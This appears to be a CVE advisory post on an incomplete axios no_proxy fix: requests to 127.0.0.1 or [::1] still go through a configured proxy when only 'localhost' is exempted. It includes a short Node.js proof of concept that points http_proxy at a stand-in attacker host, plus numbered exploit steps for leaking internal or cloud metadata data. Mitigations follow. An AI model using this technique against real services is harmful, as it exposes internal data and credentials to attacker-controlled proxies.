Axios, Hostname Normalization Bypass, CVE-2026-42038 (Medium)

By /

Listen to this Post

The fix for no_proxy hostname normalization bypass (10661) is incomplete.
When no_proxy=localhost is set, requests to 127.0.0.1 and [::1] still route through the proxy instead of bypassing it.
The shouldBypassProxy() function does pure string matching — it does not resolve IP aliases or loopback equivalents.
As a result: no_proxy=localhost does NOT block 127.0.0.1 or [::1].

Also, no_proxy=127.0.0.1 does NOT block localhost or [::1].

The function fails to treat loopback addresses as equivalent.
An attacker can leverage this by using an IP alias instead of the hostname.

In server-side environments, this bypasses no_proxy restrictions.

Requests intended for internal/cloud metadata services (e.g., 169.254.169.254) can be redirected.
The attacker-controlled proxy receives the request, leaking sensitive data.
POC: process.env.no_proxy = ‘localhost’; process.env.http_proxy = ‘http://attacker-proxy:8888’;
Axios.get(‘http://127.0.0.1:7777/’) goes to the proxy instead of directly.
Console output shows “PROXY RECEIVED REQUEST TO: http://127.0.0.1:7777/”.
The internal server is never hit directly for IP addresses.

Only exact string matches work, not canonicalization.

This is a regression from an incomplete previous fix.
The vulnerability exists in all versions with the flawed shouldBypassProxy().
No DNS or IP resolution is performed on no_proxy entries.
IPv6 loopback [::1] is also not blocked when no_proxy=localhost.
Fix requires resolving loopback aliases as equivalent before matching.

dailycve form:

Platform: Axios
Version: Before fix
Vulnerability: no_proxy bypass
Severity: Medium
date: 2026-04-01

Prediction: May 2026

What Undercode Say:

Demonstrate incomplete no_proxy bypass
export no_proxy=localhost
export http_proxy=http://attacker-proxy:8888
export https_proxy=http://attacker-proxy:8888
Run Node.js PoC
node -e "
const axios = require('axios');
(async () => {
// This bypasses proxy correctly
await axios.get('http://localhost:7777/').catch(e=>console.log('localhost:', e.message));
// This does NOT bypass proxy – goes to attacker proxy
await axios.get('http://127.0.0.1:7777/').catch(e=>console.log('127.0.0.1:', e.message));
})();
"

Exploit:

1. Set no_proxy=localhost in environment.

  1. Attacker controls http_proxy (e.g., malicious proxy on port 8888).
  2. Application makes HTTP request to 127.0.0.1 (or ::1) using axios.
  3. shouldBypassProxy() does string match – “127.0.0.1” != “localhost”.
  4. Request is sent to attacker proxy instead of localhost.
  5. Attacker proxy logs or forwards the request, leaking internal data.

Protection from this CVE

  • Upgrade axios to patched version once available (after May 2026).
  • Workaround: include all loopback aliases in no_proxy: “localhost,127.0.0.1,::1”.
  • Use environment variable NO_PROXY with explicit IPs and hostnames.
  • Avoid using axios with proxy in sensitive server-side environments.
  • Implement custom proxy bypass function that resolves IP aliases.

Impact

  • Internal services on loopback (127.0.0.1, ::1) become reachable via attacker proxy.
  • Cloud metadata endpoints (169.254.169.254) if aliased incorrectly can be leaked.
  • SSRF protections relying on no_proxy are defeated.
  • Credentials, tokens, or internal configuration may be exfiltrated.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top